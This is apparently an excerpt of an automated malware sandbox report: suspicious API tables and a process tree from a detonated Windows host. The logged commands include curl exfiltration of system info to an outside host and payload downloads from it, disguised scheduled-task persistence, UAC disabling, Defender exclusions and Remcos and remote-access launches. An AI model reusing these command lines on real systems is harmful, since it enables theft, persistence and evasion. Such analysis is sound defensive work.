| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\svchost.exe | N/A |
| N/A | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\mode.com
mode 65,10
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\TJEKXB16P8YU" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp8940.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp8940.tmp.bat
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp8F8B.tmp"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\0ZMGV3WBIMOZ" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d6041156-b889-464b-8b38-c9e6ef863c21}
C:\Windows\system32\lsass.exe
"C:\Windows\system32\lsass.exe"
C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im conhost.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\info.exe
"C:\Users\Admin\AppData\Local\Temp\a\info.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\regedit.exe
regedit /s "C:\Windows\SysWOW64\ruts\11.reg
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c delete.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\50.exe
"C:\Users\Admin\AppData\Local\Temp\a\50.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c1aa2d9e-c61f-4595-b9c9-87085f2a3831}
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 5204 -ip 5204
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5204 -s 1416
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
